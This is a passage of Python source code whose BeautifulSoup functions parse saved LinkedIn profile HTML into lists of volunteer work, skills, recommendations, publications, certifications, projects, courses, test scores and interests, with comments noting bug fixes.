        for bucket in (institutions, degrees, fields, dates, others, resumes):
            bucket.append('NULL')

    return [institutions, degrees, fields, dates, others, resumes]
def get_volunteer(web_html):
    '''Extract the volunteer section from a LinkedIn profile page.

    Parameters
    ----------
    web_html : bs4.BeautifulSoup
        Parsed html of a LinkedIn profile.

    Returns
    -------
    list
        [0] : Position titles
        [1] : Companies or organizations
        [2] : Dates of start and end
        [3] : Total time spent at each position
        [4] : Others (cause, etc.)
        [5] : Resumes (free-text information about the volunteering)

        Each entry is a list with one element per volunteer position;
        all six lists are empty when no volunteer data is found.
    '''
    titles = []
    companies = []
    dates = []
    times = []
    others = []
    resumes = []

    def _clean(tag, prefix=''):
        # Text of a tag with an optional screen-reader prefix removed;
        # '' when the tag was not found.
        if not tag:
            return ''
        text = tag.text.strip()
        return text.replace(prefix, '') if prefix else text

    # Known class-name variants of the volunteer list container;
    # passing the whole list lets find() match any of them.
    ul_class_pool = ['pv-profile-section__section-info section-info pv-profile-section__section-info--has-more',
                     'pv-profile-section__section-info section-info pv-profile-section__section-info--has-more ember-view',
                     'pv-profile-section__section-info section-info pv-profile-section__section-info--has-no-more',
                     'pv-profile-section__section-info section-info pv-profile-section__section-info--has-no-more ember-view',]

    volunteer_block = None
    volunteer_section = web_html.find('section', attrs={'class': 'pv-profile-section volunteering-section ember-view'})
    if volunteer_section:
        volunteer_block = volunteer_section.find('ul', attrs={'class': ul_class_pool})
        if not volunteer_block:
            # Diagnostic aid: LinkedIn renames classes often, so dump candidates.
            print ('ERROR: No volunteer_block found.')
            print ('Other uls found:')
            # Fixed: was 'fin_all', which raised AttributeError here.
            for candidate in volunteer_section.find_all('ul'):
                try:
                    print ('\t' + str(candidate['class']))
                except Exception:
                    pass

    if volunteer_block:
        for child in volunteer_block.children:
            if len(child) > 1:
                # Re-parse the item so find() is scoped to this entry only
                volunteer = BeautifulSoup(str(child), 'html.parser')
                titles.append(_clean(volunteer.find('h3', attrs={'class': 'Sans-17px-black-85%-semibold'})))
                companies.append(_clean(volunteer.find('h4', attrs={'class': 'Sans-15px-black-85%'}), 'Company Name\n'))
                dates.append(_clean(volunteer.find('h4', attrs={'class': 'pv-entity__date-range detail-facet inline-block Sans-15px-black-70%'}), 'Dates volunteered\n'))
                times.append(_clean(volunteer.find('h4', attrs={'class': 'detail-facet inline-block Sans-15px-black-70%'}), 'Volunteer duration\n'))
                others.append(_clean(volunteer.find('h4', attrs={'class': 'pv-entity__cause Sans-15px-black-70%'}), 'Cause'))
                resumes.append(_clean(volunteer.find('div', attrs={'class': 'pv-entity__extra-details'})))

    return [titles, companies, dates, times, others, resumes]
def get_skills(web_html):
    '''Extract the skills section from a LinkedIn profile page.

    Parameters
    ----------
    web_html : bs4.BeautifulSoup
        Parsed html of a LinkedIn profile.

    Returns
    -------
    list
        [0] : Skill names
        [1] : Skill number of endorsements (as strings; '0' when the count
              could not be parsed)

        Both lists are empty when the skills section is missing (the old
        version returned a bare [], which crashed callers indexing [0]).
    '''
    skill_names = []
    skill_endorsmentes = []

    def _collect(items):
        # Parse each skill <li>: first span is the name, second (optional)
        # span holds text like 'See 12 endorsements for Python'.
        for item in items:
            spans_list = item.find_all('span')
            if not spans_list:
                continue
            skill_name = spans_list[0].text.strip()
            skill_names.append(skill_name)
            count = '0'
            if len(spans_list) > 1:
                raw = spans_list[1].text.strip()
                # Strip the surrounding sentence, leaving only the number.
                raw = raw.replace('See ', '')
                raw = raw.replace(' endorsements for ', '')
                raw = raw.replace(' endorsement for ', '')
                raw = raw.replace(skill_name, '')
                try:
                    int(raw)  # validate only; keep the original string
                    count = raw
                except (TypeError, ValueError):
                    count = '0'
            skill_endorsmentes.append(count)

    # The section markup has two known class-name variants.
    class_labels = ['pv-profile-section pv-featured-skills-section artdeco-container-card ember-view',
                    'pv-profile-section pv-featured-skills-section artdeco-container-card first-degree ember-view']
    skills_section = None
    for label in class_labels:
        skills_section = web_html.find('section', attrs={'class': label})
        if skills_section:
            break

    if skills_section:
        # Top (highlighted) skills followed by the rest of the pool.
        _collect(skills_section.find_all('li', attrs={'class': 'pv-skill-entity--featured pb5 pv-skill-entity relative pv-skill-entity--include-highlights ember-view'}))
        _collect(skills_section.find_all('li', attrs={'class': 'pv-skill-entity--featured pb5 pv-skill-entity relative ember-view'}))

    return [skill_names, skill_endorsmentes]
def get_recommendation_buttons(web_html):
    '''Not in use.

    Extract the recommendation tab labels ('Received (n)' and 'Given (n)')
    from the raw html text of a LinkedIn profile.

    Parameters
    ----------
    web_html
        Html of a LinkedIn profile (anything str() can render).

    Returns
    -------
    list
        [0] : 'Received (n)' label text, or '' when absent
        [1] : 'Given (n)' label text, or '' when absent
    '''
    page_text = str(web_html)

    # First occurrence of each tab label; empty string when not present.
    received_match = re.search('Received \([0-9]+\)', page_text)
    received_text = received_match.group(0) if received_match else ''

    given_match = re.search('Given \([0-9]+\)', page_text)
    given_text = given_match.group(0) if given_match else ''

    return [received_text, given_text]
def get_recieved_recommendations(web_html):
    '''Extract the received recommendations from a LinkedIn profile page.

    Parameters
    ----------
    web_html : bs4.BeautifulSoup
        Parsed html of a LinkedIn profile.

    Returns
    -------
    list
        [0] : Names of the people who wrote the recommendations
        [1] : Their professional titles
        [2] : Professional relationship with the candidate
        [3] : Recommendation texts

        All four lists are empty when no recommendations are found.
    '''
    person_names = []
    person_titles = []
    common_works = []
    recommendations = []
    all_recomentadions = []

    tabs_html = web_html.find('artdeco-tabs', attrs={'class': 'ivy-tabs ember-view'})
    if tabs_html:
        rec_list = tabs_html.find('ul', attrs={'class': 'section-info'})
        if rec_list:
            for child in rec_list.children:
                if len(child) > 1:
                    # Re-parse the item so lookups stay scoped to one entry
                    entry = BeautifulSoup(str(child), 'html.parser')

                    # Name of the person who gives the recommendation
                    node = entry.find('h3', attrs={'class': 'Sans-17px-black-85%-semibold-dense'})
                    person_names.append(node.text.strip() if node else '')

                    # Title of the person who gives the recommendation
                    node = entry.find('p', attrs={'class': 'pv-recommendation-entity__headline Sans-15px-black-55% pb1'})
                    person_titles.append(node.text.strip() if node else '')

                    # Time and company where they worked together
                    node = entry.find('p', attrs={'class': 'Sans-13px-black-55%'})
                    common_works.append(node.text.strip() if node else '')

                    # Recommendation text itself
                    node = entry.find('div', attrs={'class': 'pv-recommendation-entity__highlights'})
                    recommendations.append(node.text.strip() if node else '')

    all_recomentadions.append(person_names)
    all_recomentadions.append(person_titles)
    all_recomentadions.append(common_works)
    all_recomentadions.append(recommendations)
    return all_recomentadions
def get_given_recommendations(web_html):
    '''Recieves a LinkedIn profile html and returns a list with the given recommendations information.
    Parameters
    ----------
    web_html
        Html code of a LinkedIn profile.
    Returns
    -------
    list
        [0] : Name of the person to whom the recommendation was written
        [1] : Recommendees positions
        [2] : Professional relationship with the candidate
        [3] : Recommendation text
    '''
    person_names = []
    person_titles = []
    common_works = []
    recommendations = []
    all_recomentadions = []
    recommendations_html = web_html.find('artdeco-tabs', attrs={'class':'ivy-tabs ember-view'})
    if recommendations_html:
        recommendations_block = recommendations_html.find_all('ul', attrs={'id':'recommendation-list'})
        # Bug fix: indexing recommendations_block[1] raised IndexError when the
        # "given" list was missing; guard the length before indexing.
        if len(recommendations_block) < 2 or not recommendations_block[1]:
            print ('ERROR: no recommendations_block[1] found.')
            print ('Other uls found:')
            for found_ul in recommendations_block:
                print ('\t' + str(found_ul))
        else:
            for child in recommendations_block[1].children:
                if len(child) > 1:
                    # Re-parse the entry in isolation
                    item = BeautifulSoup(str(child), 'html.parser')
                    # Get the name ('NULL' when a field is missing)
                    name_html = item.find('h3', attrs={'class':'Sans-17px-black-85%-semibold-dense'})
                    name_text = name_html.text.strip() if name_html else 'NULL'
                    person_names.append(name_text)
                    # Get position
                    position_html = item.find('p', attrs={'class':'pv-recommendation-entity__headline Sans-15px-black-55% pb1'})
                    position_text = position_html.text.strip() if position_html else 'NULL'
                    person_titles.append(position_text)
                    # Get common works
                    common_works_html = item.find('p', attrs={'class':'Sans-13px-black-55%'})
                    common_works_text = common_works_html.text.strip() if common_works_html else 'NULL'
                    common_works.append(common_works_text)
                    # Get recommendation text
                    recommendation_html = item.find('div', attrs={'class':'pv-recommendation-entity__highlights'})
                    recommendation_text = recommendation_html.text.strip() if recommendation_html else 'NULL'
                    recommendations.append(recommendation_text)
    all_recomentadions.append(person_names)
    all_recomentadions.append(person_titles)
    all_recomentadions.append(common_works)
    all_recomentadions.append(recommendations)
    return all_recomentadions
def get_recommendations(web_html, block_number):
    '''Recieves a LinkedIn profile html and returns a list with the recommendations information
    taken from the requested recommendation list.
    Parameters
    ----------
    web_html
        Html code of a LinkedIn profile.
    block_number
        Index of the recommendation list to parse (e.g. 0: received, 1: given).
    Returns
    -------
    list
        [0] : Name of the person to whom the recommendation was written
        [1] : Recommendees positions
        [2] : Professional relationship with the candidate
        [3] : Recommendation text
    '''
    person_names = []
    person_titles = []
    common_works = []
    recommendations = []
    all_recomentadions = []
    recommendations_html = web_html.find('artdeco-tabs', attrs={'class':'ivy-tabs ember-view'})
    if recommendations_html:
        recommendations_block = recommendations_html.find_all('ul', attrs={'id':'recommendation-list'})
        # Bug fix: indexing recommendations_block[block_number] raised
        # IndexError when fewer lists were present; guard the length first.
        if block_number >= len(recommendations_block) or not recommendations_block[block_number]:
            print ('ERROR: recommendations_block[' + str(block_number) + '] not found.')
            print ('Other uls found:')
            for found_ul in recommendations_block:
                try:
                    print ('\t' + str(found_ul['id']))
                except KeyError:
                    # ul without an id attribute — nothing useful to report
                    pass
        else:
            for child in recommendations_block[block_number].children:
                if len(child) > 1:
                    # Re-parse the entry in isolation
                    item = BeautifulSoup(str(child), 'html.parser')
                    # Get the name ('NULL' when a field is missing)
                    name_html = item.find('h3', attrs={'class':'Sans-17px-black-85%-semibold-dense'})
                    name_text = name_html.text.strip() if name_html else 'NULL'
                    person_names.append(name_text)
                    # Get position
                    position_html = item.find('p', attrs={'class':'pv-recommendation-entity__headline Sans-15px-black-55% pb1'})
                    position_text = position_html.text.strip() if position_html else 'NULL'
                    person_titles.append(position_text)
                    # Get common works
                    common_works_html = item.find('p', attrs={'class':'Sans-13px-black-55%'})
                    common_works_text = common_works_html.text.strip() if common_works_html else 'NULL'
                    common_works.append(common_works_text)
                    # Get recommendation text
                    recommendation_html = item.find('div', attrs={'class':'pv-recommendation-entity__highlights'})
                    recommendation_text = recommendation_html.text.strip() if recommendation_html else 'NULL'
                    recommendations.append(recommendation_text)
    all_recomentadions.append(person_names)
    all_recomentadions.append(person_titles)
    all_recomentadions.append(common_works)
    all_recomentadions.append(recommendations)
    return all_recomentadions
def get_accomplishment_button_names(web_html):
    '''Recieves a LinkedIn profile html and returns a list with the class name labels of the accomplishments section.
    Parameters
    ----------
    web_html
        Html code of a LinkedIn profile.
    Returns
    -------
    list
        Unique 'data-control-name' labels of the accomplishment expand buttons,
        in document order.
    '''
    seen_labels = []
    for button in web_html.findAll('button', attrs={'class':'pv-accomplishments-block__expand'}):
        control_name = button['data-control-name']
        if control_name not in seen_labels:
            seen_labels.append(control_name)
    return seen_labels
def get_publications_data(web_html):
    '''Recieves a LinkedIn profile html and returns a list with the publications information.
    Parameters
    ----------
    web_html
        Html code of a LinkedIn profile.
    Returns
    -------
    list
        [0] : Publication titles
        [1] : Dates of publications
        [2] : Journals in which are publish the publications
        [3] : Resumes of publications
        [4] : Links of publications
    '''
    titles_pool = []
    dates_pool = []
    journals_pool = []
    resumes_pool = []
    links_pool = []
    class_labels = ['pv-accomplishments-block__list ',
                    'pv-accomplishments-block__list pv-accomplishments-block__list--has-more']
    publications_list = None
    publications_block = web_html.find('section', attrs={'class':'accordion-panel pv-profile-section pv-accomplishments-block publications pv-accomplishments-block--expanded ember-view'})
    # Bug fix: the section itself may be missing (find returns None), and the
    # old code crashed on None.find / None.children after printing the error.
    if publications_block:
        for class_label in class_labels:
            publications_list = publications_block.find('ul', attrs={'class':class_label})
            if publications_list:
                break
    if not publications_list:
        print ('ERROR: publications_list not found.')
        if publications_block:
            print ('Other uls found:')
            for found_ul in publications_block.find_all('ul'):
                try:
                    print ('\t' + str(found_ul['class']))
                except KeyError:
                    pass
        # Return the empty pools instead of crashing below.
        return [titles_pool, dates_pool, journals_pool, resumes_pool, links_pool]
    for child in publications_list.children:
        if len(child) > 1:
            item = BeautifulSoup(str(child), "html.parser")
            # Get publication title ('' when missing)
            title_html = item.find('h4', attrs={'class':'pv-accomplishment-entity__title'})
            title_text = title_html.text.strip() if title_html else ''
            titles_pool.append(title_text.replace('publication title\n', ''))
            # Get publication date
            date_html = item.find('span', attrs={'class':'pv-accomplishment-entity__date'})
            date_text = date_html.text.strip() if date_html else ''
            dates_pool.append(date_text.replace('publication date', ''))
            # Get publication journal
            journal_html = item.find('span', attrs={'class':'pv-accomplishment-entity__publisher'})
            journal_text = journal_html.text.strip() if journal_html else ''
            journals_pool.append(journal_text.replace('publication description\n', ''))
            # Get publication resume
            resume_html = item.find('p', attrs={'class':'pv-accomplishment-entity__description Sans-15px-black-70%'})
            resume_text = resume_html.text.strip() if resume_html else ''
            resumes_pool.append(resume_text.replace('publication description\n', ''))
            # Get publication links (deduplicated, in document order)
            publi_links = []
            for link_html in item.findAll('a', href=True):
                link_text = link_html['href']
                if link_text not in publi_links:
                    publi_links.append(link_text)
            links_pool.append(publi_links)
    return [titles_pool, dates_pool, journals_pool, resumes_pool, links_pool]
def get_certifications_data(web_html):
    '''Recieves a LinkedIn profile html and returns a list with the certifications information.
    Parameters
    ----------
    web_html
        Html code of a LinkedIn profile.
    Returns
    -------
    list
        [0] : Certification titles
        [1] : Dates of certification
        [2] : Issuing entities
    '''
    titles_pool = []
    dates_pool = []
    entities_pool = []
    class_labels = ['pv-accomplishments-block__list ',
                    'pv-accomplishments-block__list pv-accomplishments-block__list--has-more']
    certifications_list = None
    certifications_section = web_html.find('section', attrs={'class':'accordion-panel pv-profile-section pv-accomplishments-block certifications pv-accomplishments-block--expanded ember-view'})
    # Bug fix: the section may be missing (find returns None) and the old code
    # crashed on None.find / None.children after printing the error.
    if certifications_section:
        for class_label in class_labels:
            certifications_list = certifications_section.find('ul', attrs={'class':class_label})
            if certifications_list:
                break
    if not certifications_list:
        print ('ERROR: certifications_list not found.')
        if certifications_section:
            print ('Other uls found:')
            for found_ul in certifications_section.find_all('ul'):
                try:
                    print ('\t' + str(found_ul['class']))
                except KeyError:
                    pass
        # Return the empty pools instead of crashing below.
        return [titles_pool, dates_pool, entities_pool]
    for child in certifications_list.children:
        if len(child) > 1:
            item = BeautifulSoup(str(child), "html.parser")
            # Get title ('' when missing)
            title_html = item.find('h4', attrs={'class':'pv-accomplishment-entity__title'})
            title_text = title_html.text.strip() if title_html else ''
            titles_pool.append(title_text.replace('Title', ''))
            # Get date
            date_html = item.find('p', attrs={'class':'pv-accomplishment-entity__subtitle'})
            date_text = date_html.text.strip() if date_html else ''
            dates_pool.append(date_text.replace('Certification Date' ,''))
            # Get certification entity
            entity_html = item.find('a', attrs={'name':'certification_detail_company'})
            entity_text = entity_html.text.strip() if entity_html else ''
            entities_pool.append(entity_text)
    return [titles_pool, dates_pool, entities_pool]
def get_honors_data(web_html):
    '''Recieves a LinkedIn profile html and returns a list with the honors and awards information.
    Parameters
    ----------
    web_html
        Html code of a LinkedIn profile.
    Returns
    -------
    list
        [0] : Awards titles
        [1] : Dates of awards
        [2] : Issuing entities
        [3] : Resumes of awards
    '''
    titles_pool = []
    dates_pool = []
    entities_pool = []
    resumes_pool = []
    class_labels = ['pv-accomplishments-block__list ',
                    'pv-accomplishments-block__list pv-accomplishments-block__list--has-more']
    honors_list = None
    honors_section = web_html.find('section', attrs={'class':'accordion-panel pv-profile-section pv-accomplishments-block honors pv-accomplishments-block--expanded ember-view'})
    # Bug fix: the section may be missing (find returns None) and the old code
    # crashed on None.find / None.children after printing the error.
    if honors_section:
        for class_label in class_labels:
            honors_list = honors_section.find('ul', attrs={'class':class_label})
            if honors_list:
                break
    if not honors_list:
        print ('ERROR: honors_list not found.')
        if honors_section:
            print ('Other uls found:')
            for found_ul in honors_section.find_all('ul'):
                try:
                    print ('\t' + str(found_ul['class']))
                except KeyError:
                    pass
        # Return the empty pools instead of crashing below.
        return [titles_pool, dates_pool, entities_pool, resumes_pool]
    for child in honors_list.children:
        if len(child) > 1:
            item = BeautifulSoup(str(child), 'html.parser')
            # Get title ('' when missing)
            title_html = item.find('h4', attrs={'class':'pv-accomplishment-entity__title'})
            title_text = title_html.text.strip() if title_html else ''
            titles_pool.append(title_text.replace('honor title', ''))
            # Get date
            date_html = item.find('span', attrs={'class':'pv-accomplishment-entity__date'})
            date_text = date_html.text.strip() if date_html else ''
            dates_pool.append(date_text.replace('honor date', ''))
            # Get entity
            entity_html = item.find('span', attrs={'class':'pv-accomplishment-entity__issuer'})
            entity_text = entity_html.text.strip() if entity_html else ''
            entities_pool.append(entity_text.replace('honor issuer', ''))
            # Get resume
            resume_html = item.find('p', attrs={'class':'pv-accomplishment-entity__description Sans-15px-black-70%'})
            resume_text = resume_html.text.strip() if resume_html else ''
            resumes_pool.append(resume_text.replace('honor description', ''))
    return [titles_pool, dates_pool, entities_pool, resumes_pool]
def get_languages_data(web_html):
    '''Recieves a LinkedIn profile html and returns a list with the languages information.
    Parameters
    ----------
    web_html
        Html code of a LinkedIn profile.
    Returns
    -------
    list
        [0] : Languages
        [1] : Languages profiency
    '''
    languages_pool = []
    proficiency_pool = []
    class_labels = ['pv-accomplishments-block__list ',
                    'pv-accomplishments-block__list pv-accomplishments-block__list--has-more']
    languages_list = None
    languages_section = web_html.find('section', attrs={'class':'accordion-panel pv-profile-section pv-accomplishments-block languages pv-accomplishments-block--expanded ember-view'})
    # Bug fix: the section may be missing (find returns None) and the old code
    # crashed on None.find / None.children after printing the error.
    if languages_section:
        for class_label in class_labels:
            languages_list = languages_section.find('ul', attrs={'class':class_label})
            if languages_list:
                break
    if not languages_list:
        print ('ERROR: languages_list not found.')
        if languages_section:
            print ('Other uls found:')
            for found_ul in languages_section.find_all('ul'):
                try:
                    print ('\t' + str(found_ul['class']))
                except KeyError:
                    pass
        # Return the empty pools instead of crashing below.
        return [languages_pool, proficiency_pool]
    for child in languages_list.children:
        if len(child) > 1:
            item = BeautifulSoup(str(child), 'html.parser')
            # Get language ('' when missing)
            language_html = item.find('h4', attrs={'class':'pv-accomplishment-entity__title'})
            language_text = language_html.text.strip() if language_html else ''
            languages_pool.append(language_text.replace('Language name', ''))
            # Get proficiency
            proficiency_html = item.find('p', attrs={'class':'pv-accomplishment-entity__proficiency pv-accomplishment-entity__subtitle'})
            proficiency_text = proficiency_html.text.strip() if proficiency_html else ''
            proficiency_pool.append(proficiency_text)
    return [languages_pool, proficiency_pool]
def get_organizations_data(web_html):
    '''Recieves a LinkedIn profile html and returns a list with the organizations to which the candidate belongs to.
    Parameters
    ----------
    web_html
        Html code of a LinkedIn profile.
    Returns
    -------
    list
        [0] : Organization names
        [1] : Dates at which the the candidate had belong to those organizations
        [2] : Positions inside the organizations
    '''
    names_pool = []
    dates_pool = []
    positions_pool = []
    class_labels = ['pv-accomplishments-block__list ',
                    'pv-accomplishments-block__list pv-accomplishments-block__list--has-more']
    organization_list = None
    organization_section = web_html.find('section', attrs={'class':'accordion-panel pv-profile-section pv-accomplishments-block organizations pv-accomplishments-block--expanded ember-view'})
    # Bug fix: the section may be missing (find returns None) and the old code
    # crashed on None.find / None.children after printing the error.
    if organization_section:
        for class_label in class_labels:
            organization_list = organization_section.find('ul', attrs={'class':class_label})
            if organization_list:
                break
    if not organization_list:
        print ('ERROR: organization_list not found.')
        if organization_section:
            print ('Other uls found:')
            for found_ul in organization_section.find_all('ul'):
                try:
                    print ('\t' + str(found_ul['class']))
                except KeyError:
                    pass
        # Return the empty pools instead of crashing below.
        return [names_pool, dates_pool, positions_pool]
    for child in organization_list.children:
        if len(child) > 1:
            # Re-parse the entry in isolation
            item = BeautifulSoup(str(child), 'html.parser')
            # Get the name ('' when missing)
            name_html = item.find('h4', attrs={'class':'pv-accomplishment-entity__title'})
            name_text = name_html.text.strip() if name_html else ''
            names_pool.append(name_text)
            # Get the dates
            date_html = item.find('span', attrs={'class':'pv-accomplishment-entity__subtitle'})
            date_text = date_html.text.strip() if date_html else ''
            dates_pool.append(date_text.replace('organization date', ''))
            # Get the position in the organization
            position_html = item.find('span', attrs={'class':'pv-accomplishment-entity__position'})
            position_text = position_html.text.strip() if position_html else ''
            positions_pool.append(position_text.replace('organization position', ''))
    return [names_pool, dates_pool, positions_pool]
def get_patents_data(web_html):
    '''Recieves a LinkedIn profile html and returns a list with the patents information.
    Parameters
    ----------
    web_html
        Html code of a LinkedIn profile.
    Returns
    -------
    list
        [0] : Patent titles
        [1] : Dates of patents
        [2] : Patents references
        [3] : Resumes of patents
    '''
    titles_pool = []
    dates_pool = []
    references_pool = []
    resumes_pool = []
    class_labels = ['pv-accomplishments-block__list ',
                    'pv-accomplishments-block__list pv-accomplishments-block__list--has-more']
    patents_list = None
    patents_section = web_html.find('section', attrs={'class':'accordion-panel pv-profile-section pv-accomplishments-block patents pv-accomplishments-block--expanded ember-view'})
    # Bug fix: the section may be missing (find returns None) and the old code
    # crashed on None.find / None.children after printing the error.
    if patents_section:
        for class_label in class_labels:
            patents_list = patents_section.find('ul', attrs={'class':class_label})
            if patents_list:
                break
    if not patents_list:
        print ('ERROR: patents_list not found.')
        if patents_section:
            print ('Other uls found:')
            for found_ul in patents_section.find_all('ul'):
                try:
                    print ('\t' + str(found_ul['class']))
                except KeyError:
                    pass
        # Return the empty pools instead of crashing below.
        return [titles_pool, dates_pool, references_pool, resumes_pool]
    for child in patents_list.children:
        if len(child) > 1:
            # Re-parse the entry in isolation
            item = BeautifulSoup(str(child), 'html.parser')
            # Get title ('' when missing)
            title_html = item.find('h4', attrs={'class':'pv-accomplishment-entity__title'})
            title_text = title_html.text.strip() if title_html else ''
            titles_pool.append(title_text.replace('Patent title', ''))
            # Get the date
            date_html = item.find('span', attrs={'class':'pv-accomplishment-entity__date'})
            date_text = date_html.text.strip() if date_html else ''
            dates_pool.append(date_text.replace('Patent date', ''))
            # Get patent reference number
            reference_html = item.find('span', attrs={'class':'pv-accomplishment-entity__issuer'})
            reference_text = reference_html.text.strip() if reference_html else ''
            references_pool.append(reference_text.replace('Patent issuer and number', ''))
            # Get the resume
            resume_html = item.find('p', attrs={'class':'pv-accomplishment-entity__description Sans-15px-black-70%'})
            resume_text = resume_html.text.strip() if resume_html else ''
            resumes_pool.append(resume_text.replace('Patent description', ''))
    return [titles_pool, dates_pool, references_pool, resumes_pool]
def get_projects_data(web_html):
    '''Recieves a LinkedIn profile html and returns a list with the projects information.
    Parameters
    ----------
    web_html
        Html code of a LinkedIn profile.
    Returns
    -------
    list
        [0] : Projects titles
        [1] : Dates of projects
        [2] : Resumes of projects
        [3] : Links of projects
    '''
    titles_pool = []
    dates_pool = []
    resumes_pool = []
    links_pool = []
    class_labels = ['pv-accomplishments-block__list ',
                    'pv-accomplishments-block__list pv-accomplishments-block__list--has-more']
    projects_list = None
    projects_section = web_html.find('section', attrs={'class':'accordion-panel pv-profile-section pv-accomplishments-block projects pv-accomplishments-block--expanded ember-view'})
    # Bug fix: the section may be missing (find returns None) and the old code
    # crashed on None.find / None.children after printing the error.
    if projects_section:
        for class_label in class_labels:
            projects_list = projects_section.find('ul', attrs={'class':class_label})
            if projects_list:
                break
    if not projects_list:
        print ('ERROR: projects_list not found.')
        if projects_section:
            print ('Other uls found:')
            for found_ul in projects_section.find_all('ul'):
                try:
                    print ('\t' + str(found_ul['class']))
                except KeyError:
                    pass
        # Return the empty pools instead of crashing below.
        return [titles_pool, dates_pool, resumes_pool, links_pool]
    for child in projects_list.children:
        if len(child) > 1:
            # Re-parse the entry in isolation
            item = BeautifulSoup(str(child), 'html.parser')
            # Get title ('' when missing)
            title_html = item.find('h4', attrs={'class':'pv-accomplishment-entity__title'})
            title_text = title_html.text.strip() if title_html else ''
            titles_pool.append(title_text.replace('Project name', ''))
            # Get date
            date_html = item.find('p', attrs={'class':'pv-accomplishment-entity__date pv-accomplishment-entity__subtitle'})
            date_text = date_html.text.strip() if date_html else ''
            dates_pool.append(date_text)
            # Get resume; fall back to the whole entry text when empty
            resume_html = item.find('p', attrs={'class':'pv-accomplishment-entity__description Sans-15px-black-70%'})
            resume_text = resume_html.text.strip() if resume_html else ''
            if resume_text == '':
                resume_text = item.text.strip()
            resumes_pool.append(resume_text)
            # Get links (deduplicated, in document order)
            project_links = []
            for link in item.findAll('a', href=True):
                link_text = link['href']
                if link_text not in project_links:
                    project_links.append(link_text)
            links_pool.append(project_links)
    return [titles_pool, dates_pool, resumes_pool, links_pool]
def get_course_data(web_html):
    '''Recieves a LinkedIn profile html and returns a list with the courses information.
    Parameters
    ----------
    web_html
        Html code of a LinkedIn profile.
    Returns
    -------
    list
        [0] : Courses titles
        [1] : Other information about the courses
    '''
    titles_pool = []
    extras_pool = []
    class_labels = ['pv-accomplishments-block__list ',
                    'pv-accomplishments-block__list pv-accomplishments-block__list--has-more']
    # Bug fix: the original assigned the found ul to `projects_list` but then
    # referenced an undefined `course_list`, raising NameError on every call.
    course_list = None
    course_section = web_html.find('section', attrs={'class':'accordion-panel pv-profile-section pv-accomplishments-block courses pv-accomplishments-block--expanded ember-view'})
    # Also guard against the section itself being missing (find returns None).
    if course_section:
        for class_label in class_labels:
            course_list = course_section.find('ul', attrs={'class':class_label})
            if course_list:
                break
    if not course_list:
        print ('ERROR: course_list not found.')
        if course_section:
            print ('Other uls found:')
            for found_ul in course_section.find_all('ul'):
                try:
                    print ('\t' + str(found_ul['class']))
                except KeyError:
                    pass
        # Return the empty pools instead of crashing below.
        return [titles_pool, extras_pool]
    for child in course_list.children:
        if len(child) > 1:
            # Re-parse the entry in isolation
            item = BeautifulSoup(str(child), 'html.parser')
            # Get title ('' when missing)
            title_html = item.find('h4', attrs={'class':'pv-accomplishment-entity__title'})
            title_text = title_html.text.strip() if title_html else ''
            titles_pool.append(title_text.replace('Course name', ''))
            # Get extra info (course number)
            extra_html = item.find('p', attrs={'class':'pv-accomplishment-entity__course-number pv-accomplishment-entity__subtitle'})
            extra_text = extra_html.text.strip() if extra_html else ''
            extras_pool.append(extra_text.replace('Course number', ''))
    return [titles_pool, extras_pool]
def get_test_scores_data(web_html):
    '''Recieves a LinkedIn profile html and returns a list with the scorers information.
    Parameters
    ----------
    web_html
        Html code of a LinkedIn profile.
    Returns
    -------
    list
        [0] : Titles
        [1] : Dates
        [2] : Scorers
        [3] : Resumes of scorers
    '''
    titles_pool = []
    dates_pool = []
    scorers_pool = []
    resumes_pool = []
    class_labels = ['pv-accomplishments-block__list ',
                    'pv-accomplishments-block__list pv-accomplishments-block__list--has-more']
    scorers_list = None
    scorers_section = web_html.find('section', attrs={'class':'accordion-panel pv-profile-section pv-accomplishments-block test-scores pv-accomplishments-block--expanded ember-view'})
    # Bug fix: the section may be missing (find returns None) and the old code
    # crashed on None.find / None.children after printing the error.
    if scorers_section:
        for class_label in class_labels:
            scorers_list = scorers_section.find('ul', attrs={'class':class_label})
            if scorers_list:
                break
    if not scorers_list:
        print ('ERROR: scorers_list not found.')
        if scorers_section:
            print ('Other uls found:')
            for found_ul in scorers_section.find_all('ul'):
                try:
                    print ('\t' + str(found_ul['class']))
                except KeyError:
                    pass
        # Return the empty pools instead of crashing below.
        return [titles_pool, dates_pool, scorers_pool, resumes_pool]
    for child in scorers_list.children:
        if len(child) > 1:
            # Re-parse the entry in isolation
            item = BeautifulSoup(str(child), 'html.parser')
            # Get title ('' when missing)
            title_html = item.find('h4', attrs={'class':'pv-accomplishment-entity__title'})
            title_text = title_html.text.strip() if title_html else ''
            titles_pool.append(title_text.replace('Test name', ''))
            # Get date. The span usually holds "<label>\n<value>"; bug fix:
            # indexing [1] raised IndexError when there was no newline.
            date_text = ''
            date_html = item.find('span', attrs={'class':'pv-accomplishment-entity__date'})
            if date_html:
                date_broken = date_html.text.strip().split('\n')
                date_text = date_broken[1] if len(date_broken) > 1 else date_broken[0]
            dates_pool.append(date_text)
            # Get scorers
            scorer_html = item.find('span', attrs={'class':'pv-accomplishment-entity__score'})
            scorer_text = scorer_html.text.strip() if scorer_html else ''
            scorers_pool.append(scorer_text)
            # Get resume
            resume_html = item.find('p', attrs={'class':'pv-accomplishment-entity__description Sans-15px-black-70%'})
            resume_text = resume_html.text.strip() if resume_html else ''
            resumes_pool.append(resume_text)
    return [titles_pool, dates_pool, scorers_pool, resumes_pool]
def get_interests_from_profile(web_html):
    '''Recieves a LinkedIn profile html and returns a list with the interests.
    Parameters
    ----------
    web_html
        Html code of a LinkedIn profile.
    Returns
    -------
    list
        [0] : Interests titles
        [1] : Interests number of followers
    '''
    interests = []
    followers = []
    interests_block_html = web_html.find('section', attrs={'class':'pv-profile-section pv-interests-section artdeco-container-card ember-view'})
    # Bug fix: the interests section may be missing entirely; the old code
    # crashed on None.findAll (and on missing inner tags).
    if interests_block_html:
        for interest_html in interests_block_html.findAll('li', attrs={'class':'pv-interest-entity pv-profile-section__card-item ember-view'}):
            interest_name_html = interest_html.find('h3', attrs={'class':'pv-entity__summary-title Sans-17px-black-85%-semibold'})
            interest_name_text = interest_name_html.text.strip() if interest_name_html else ''
            interests.append(interest_name_text)
            followers_html = interest_html.find('p', attrs={'class':'pv-entity__follower-count Sans-15px-black-55%'})
            followers_text = followers_html.text.strip() if followers_html else ''
            # Strip the label words (plural forms first), spaces and thousands commas,
            # leaving just the digits.
            for token in ('followers', 'follower', 'members', 'member', ' ', ','):
                followers_text = followers_text.replace(token, '')
            followers.append(followers_text)
    return [interests, followers]
def interest_pages(web_html):
    '''Checks if there are more interests.
    Returns True when the html links to the "/detail/interests/" page,
